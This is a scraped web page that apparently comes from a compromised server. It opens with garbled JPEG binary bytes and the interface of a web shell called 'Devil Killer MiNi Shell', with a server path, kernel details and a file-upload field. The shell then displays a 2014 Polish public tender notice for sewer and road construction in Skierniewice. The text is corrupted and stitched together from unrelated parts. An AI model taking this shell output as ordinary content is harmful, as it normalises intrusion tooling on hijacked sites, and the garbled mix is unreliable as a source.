JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140805/261116-N-2014.html

<p class="kh_header"><b>Skierniewice: Cz. I:Budowa kanalizacji sanitarnej i deszczowej wraz z odtworzeniem pasa drogowego w ulicy Rawskiej (odcinek od Al. Niepodległości do ul. Kopernika) i ulicy Trzcińskiej w Skierniewicach. Cz. II: Budowa kanalizacji sanitarnej wraz z odtworzeniem pasa drogowego w ulicy Rawskiej (odcinek drogi wojewódzkiej od ul. Kopernika do ul. Granicznej) w Skierniewicach.</b><br>
<b>Numer ogłoszenia: 261116 - 2014; data zamieszczenia: 05.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji "WOD-KAN" Sp. z o.o. , Mokra Prawa 30, 96-100 Skierniewice, woj. łódzkie, tel. 046 8333808, faks 046 8334668.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodkan-skierniewice.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Cz. I:Budowa kanalizacji sanitarnej i deszczowej wraz z odtworzeniem pasa drogowego w ulicy Rawskiej (odcinek od Al. Niepodległości do ul. Kopernika) i ulicy Trzcińskiej w Skierniewicach. Cz. II: Budowa kanalizacji sanitarnej wraz z odtworzeniem pasa drogowego w ulicy Rawskiej (odcinek drogi wojewódzkiej od ul. Kopernika do ul. Granicznej) w Skierniewicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Cz. I -Budowa kanalizacji sanitarnej i deszczowej wraz z odtworzeniem pasa drogowego w ulicy Rawskiej odcinek od Al. Niepodległości do ul. Kopernika i ulicy Trzcińskiej w Skierniewicach, w tym: Zakres prac przy budowie kanalizacji sanitarnej w ul. Rawskiej w Skierniewicach obejmuje odcinek od studni S2 bez studni w Al. Niepodległości do studni S14 wraz ze studnią tj.: - kanał sanitarny z rur kamionkowych Dn 400 mm, - przykanaliki sanitarne z rur PCV SN 8 Dn 160 mm, - studnie rewizyjne Dn 1200 mm z kręgów betonowych, - odtworzenie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych, - odtworzenie nawierzchni z kostki brukowej betonowej na zjazdach , - odtworzenie chodników z kostki brukowej betonowej, - odtworzenie zieleni. Wykonawca wykona przedmiot zamówienia z materiałów własnych. Włazy kanalizacyjne z logo ZWiK WOD-KAN zapewni Zamawiający. Zadanie dotyczące budowy kanalizacji sanitarnej wraz z odtworzeniem pasa drogowego w ul. Rawskiej od Al. Niepodległości do ul. Kopernika w Skierniewicach-zadanie4,wchodzi w skład Projektu Uporządkowanie gospodarki ściekowej w mieście Skierniewice współfinansowanego przez Unię Europejską ze środków Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko. Zakres prac przy budowie kanalizacji sanitarnej w ul. Trzcińskiej w Skierniewicach obejmuje: - kanał sanitarny z rur PCV Dn 315 mm, - przykanaliki z rur PCV Dn 160 mm, 200, 250, 315, - studnie rewizyjne Dn 1200 mm z kręgów betonowych, - studnie rewizyjne Dn 425 mm z PCV, - odtworzenie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych, - odtworzenie nawierzchni z kostki brukowej betonowej na zjazdach, - odtworzenie chodników z kostki brukowej betonowej, - odtworzenie zieleni. Wykonawca wykona przedmiot zamówienia z materiałów własnych. Włazy kanalizacyjne z logo ZWiK WOD-KAN zapewni Zamawiający. Zakres prac przy budowie kanalizacji deszczowej w ul. Rawskiej i Trzcińskiej w Skierniewicach obejmuje: - kanał deszczowy z rur żelbetowych Dn 800 mm, - kanał deszczowy z rur żelbetowych Dn 600 mm, - kanał deszczowy z rur żelbetowych Dn 400 mm, - kanał deszczowy z rur żelbetowych Dn 315 mm, - przykanaliki z rur PVC SN 8 fi 200 mm, - studnie rewizyjne Dn 1200 mm z kręgów betonowych, - studnie rewizyjne Dn 1400 mm z kręgów betonowych, - studnie rewizyjne Dn 1600 mm z kręgów betonowych, - podłączenie wpustów ściekowych z osadnikiem Dn 500, - przebudowę wodociągu, - odtworzenie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych, - odtworzenie zjazdów, - odtworzenie chodników, - odtworzenie zieleni . Wykonawca wykona przedmiot zamówienia z materiałów własnych. Cz. II: Budowa kanalizacji sanitarnej wraz z odtworzeniem pasa drogowego w ulicy Rawskiej odcinek drogi wojewódzkiej od ul. Kopernika do ul. Granicznej w Skierniewicach. Zakres prac w ul. Rawskiej w Skierniewicach na odcinku drogi wojewódzkiej od ul. Kopernika do ul. Granicznej obejmuje budowę: - kanału sanitarnego z rur kamionkowych fi 400 mm, - przykanaliki sanitarne z rur PCV fi 160 mm, - studni rewizyjnych fi 1200 mm z kręgów betonowych, - odtworzenie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych, - odtworzenie nawierzchni z kostki brukowej betonowej na zjazdach, - odtworzenie chodników z kostki brukowej betonowej, - odtworzenie zieleni. Wykonawca wykona przedmiot zamówienia z materiałów własnych. Włazy kanalizacyjne z logo ZWiK WOD-KAN zapewni Zamawiający. Zadanie dotyczące budowy kanalizacji sanitarnej wraz z odtworzeniem pasa drogowego w ul. Rawskiej odcinek drogi wojewódzkiej od ul. Kopernika do ul. Granicznej w Skierniewicach - zadanie 4, wchodzi w skład Projektu Uporządkowanie gospodarki ściekowej w mieście Skierniewice współfinansowanego przez Unię Europejską ze środków Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko. Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa oraz Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych STWiORB. Wymagania dotyczące gwarancji: - dla cz. I przedmiotu zamówienia okres gwarancji wynosi 4 lata od daty końcowego odbioru przedmiotu umowy. - dla cz. II przedmiotu zamówienia okres gwarancji wynosi 3 lata od daty końcowego odbioru przedmiotu umowy. Uwaga:- Nazw materiałów, urządzeń lub producentów, które mogą pojawić się w dokumentacji projektowej nie należy traktować jako narzuconych bądź sugerowanych przez Zamawiającego. Zamawiający dopuszcza zastosowanie innego równoważnego do podanego w dokumentacji materiału lub urządzenia pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, potwierdzających spełnienie wymaganych parametrów. - Gdziekolwiek w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych STWiORB opisano przedmiot zamówienia za pomocą norm, aprobat, specyfikacji technicznych i innych systemów odniesienia, tam dopuszcza się również rozwiązania równoważne opisywanym, przy czym Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest zobowiązany wykazać, że oferowane przez niego roboty budowlane spełniają wymagania określone przez Zamawiającego. - Dołączone przedmiary mają charakter pomocniczy - podstawą do sporządzenia oferty jest dokumentacja projektowa, Specyfikacje Techniczne Wykonania i Odbioru Robót. Termin wykonania zamówienia: dla części I przedmiotu zamówienia Budowa kanalizacji sanitarnej i deszczowej wraz z odtworzeniem pasa drogowego w ulicy Rawskiej odcinek od Al. Niepodległości do ul. Kopernika i ulicy Trzcińskiej w Skierniewicach ustala się na okres od dnia podpisania umowy do 30.11.2014r. dla cz. II Budowa kanalizacji sanitarnej wraz z odtworzeniem pasa drogowego w ulicy Rawskiej -odcinek drogi wojewódzkiej od ul. Kopernika do ul. Granicznej w Skierniewicach na okres od 01.12.2014r. do 30.06.2015r. Termin rozpoczęcia robót budowlanych dotyczących części II przedmiotu zamówienia uzależniony jest od dnia dopuszczenia do ruchu kołowego nowo budowanej obwodnicy łączącej Rondo Solidarności z ul. Rawską w Skierniewicach -planowany termin dopuszczenia ruchu 30.11.2014 r. Uwaga: W przypadku przedstawienia przez Wykonawców dokumentów, w których będą waluty inne niż PLN będą one podlegały przeliczeniu na PLN ( w celu potwierdzenia spełniania warunków) według średniego kursu NBP z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.10.00-8, 45.23.31.42-6, 45.23.32.52-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości: dla cz. I przedmiotu zamówienia: 100 000,00 zł. (słownie złotych: sto tysięcy 00/100), w tym: - Budowa kanalizacji sanitarnej wraz z odtworzeniem pasa drogowego w ulicy Rawskiej (odcinek od Al. Niepodległości do ul. Kopernika) i ulicy Trzcińskiej w Skierniewicach 70 000,00 zł. (słownie złotych: siedemdziesiąt tysięcy 00/100) - Budowa kanalizacji deszczowej wraz z odtworzeniem pasa drogowego w ulicy Rawskiej (odcinek od Al. Niepodległości do ul. Kopernika) i ulicy Trzcińskiej w Skierniewicach 30 000,00 zł. (słownie złotych: trzydzieści tysięcy 00/100), dla cz. II przedmiotu zamówienia: 43 000,00 zł. (słownie złotych: czterdzieści trzy tysiące 00/100) 2) Wadium może być wnoszone w jednej lub kilku następujących formach: - pieniądzu; - poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; - gwarancjach bankowych; - gwarancjach ubezpieczeniowych; - poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2007r. Nr. 42, poz.275, z późn. zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie będzie wymagał wykazania się spełnianiem tego warunku w sposób szczególny tj. warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca złoży oświadczenie stanowiące zał. nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca ( w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia , oceniane będą łącznie ich kwalifikacje i doświadczenie)wykaże , że - dla cz. I przedmiotu zamówienia -wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 robotę budowlaną w zakresie budowy, remontu lub przebudowy branży inżynieryjno-sanitarnej sieci kanalizacyjnych wraz z odtworzeniem nawierzchni o wartości minimum 4 mln zł (brutto). - dla cz. II przedmiotu zamówienia -wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 robotę budowlaną w zakresie budowy, remontu lub przebudowy branży inżynieryjno-sanitarnej sieci kanalizacyjnych wraz z odtworzeniem nawierzchni o wartości minimum 2 mln zł (brutto). 
Zamawiający dokona oceny spełniania warunku na podstawie wykazu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy wykonane zostały zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone stanowiącego zał. nr 4 SIWZ oraz analizy treści oświadczenia stanowiącego zał. nr 7 do SIWZ.
Przez najważniejsze roboty zamawiający rozumie roboty budowlane obejmujące budowę, remont lub przebudowę branży inżynieryjno-sanitarnej sieci kanalizacyjnych wraz z odtworzeniem nawierzchni o  wartości minimum: dla cz. I przedmiotu zamówienia 4 mln  zł (brutto), dla cz. II przedmiotu zamówienia 2 mln  zł (brutto).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie będzie wymagał wykazania się spełnianiem tego warunku w sposób szczególny tj. warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca złoży oświadczenie stanowiące zał. nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca dla cz. I, II przedmiotu zamówienia ( w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy) wskaże osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności osoby odpowiedzialne za kierowanie robotami budowlanymi wraz z informacjami na temat ich doświadczenia, kwalifikacji zawodowych i wykształcenia niezbędnych do wykonania zamówienia, a także wykonywanych przez nich czynności oraz informację o podstawie do dysponowania tymi osobami: - kierownik budowy - posiadający uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów prawa, uprawniające do kierowania robotami budowlanymi w zakresie specjalności techniczno-budowlanych instalacji i urządzeń sanitarnych; - kierownik robót drogowych - posiadający uprawnienia w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane do kierowania robotami w specjalności drogowej, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa. Dopuszcza się, żeby Wykonawca dysponował jednym kierownikiem budowy, który posiada uprawnienia zarówno w branży sanitarnej i drogowej. Zamawiający dokona oceny spełniania warunku na podstawie analizy treści dokumentów oraz oświadczenia wymienionych w rozdz. 6 pkt. 6.1 ppkt. 1, 3 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że: - dla cz. I przedmiotu zamówienia: a) posiada środki finansowe lub posiada zdolność kredytową w wysokości co najmniej 5 mln PLN. b) posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 5 mln PLN. - dla cz. II przedmiotu zamówienia: a) posiada środki finansowe lub posiada zdolność kredytową w wysokości co najmniej 2 mln PLN. b) posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 2 mln PLN - w przypadku składania ofert na obydwie części zamówienia: a) posiada środki finansowe lub posiada zdolność kredytową w wysokości co najmniej 5 mln PLN. b) posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 5 mln PLN. Dla cz. I ,II przedmiotu zamówienia w celu potwierdzenia spełniania warunków określonych powyżej Wykonawca zobowiązany jest przedłożyć dokumenty oraz oświadczenia wymienione w rozdz. 6 pkt.6.1 ppkt 1,4,5 SIWZ. W przypadku Wykonawców występujących wspólnie warunek dotyczący sytuacji ekonomicznej i finansowej może być spełniony łącznie - sumowanie. W przypadku Wykonawców występujących wspólnie dokumenty na potwierdzenie spełniania powyższych warunków mogą pochodzić od jednego, kilku lub wszystkich wykonawców. Zamawiający dokona oceny spełniania warunku na podstawie analizy treści dokumentów oraz oświadczenia wymienionych w rozdz. 6 pkt.6.1 ppkt 1,4,5 SIWZ.
Uwaga: W przypadku przedstawienia przez Wykonawców dokumentów, w których będą waluty inne niż PLN będą one podlegały przeliczeniu na PLN ( w celu potwierdzenia spełniania warunków) według średniego kursu NBP z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

